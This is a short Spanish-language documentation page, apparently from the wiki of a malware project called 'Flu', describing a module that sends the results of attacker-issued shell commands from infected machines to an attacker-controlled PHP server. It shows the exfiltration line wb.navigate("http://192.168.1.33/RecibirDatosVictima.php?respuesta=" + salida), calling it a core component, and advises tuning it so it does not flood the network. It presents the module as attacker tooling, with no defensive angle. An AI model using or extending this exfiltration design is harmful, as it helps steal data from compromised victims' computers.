Navigation

Navigation
Versión: 0.1B

Objetivo: enviar los resultados de la ejecución de las instrucciones a un servidor web manejado por el atacante mediante PHP. En este servidor la información se clasificará en función del usuario o dirección IP. Con estas acciones un atacante puede tener la información clasificada y puede estudiar vulnerabilidades y características de los equipos infectados.

Descripción: este módulo presenta la forma en la que la información que devuelve la Shell tras la ejecución de las instrucciones escritas por el atacante es enviada al servidor web que manipula el atacante. El servidor web tiene detrás una aplicación PHP (la cual también es entregada con el código fuente).

Esta aplicación tiene un parámetro, el cual puede ser denominado clave, que se denomina “respuesta”. Por lo que las peticiones de devolución de información al servidor web se realizarán de la siguiente manera:

wb.navigate("http://192.168.1.33/RecibirDatosVictima.php?respuesta=" + salida);

En el que wb es un objeto que representa a un web browser interno que lleva Flu. En el ejemplo el servidor web se encuentra en la IP 192.168.1.33, pero esto podría ser cualquier IP o dominio. El fichero, para que se observe claramente, se denominó RecibirDatosVictima.php, y el parámetro respuesta equivale al valor de la variable salida, que será la variable que contiene la ejecución de una instrucción.

En definitiva es otro de los núcleos fundamentales del proyecto. Es imprescindible un estudio correcto sobre este módulo e intentar optimizarlo al máximo ya que tampoco se debería inyectar o inundar la red con peticiones PHP.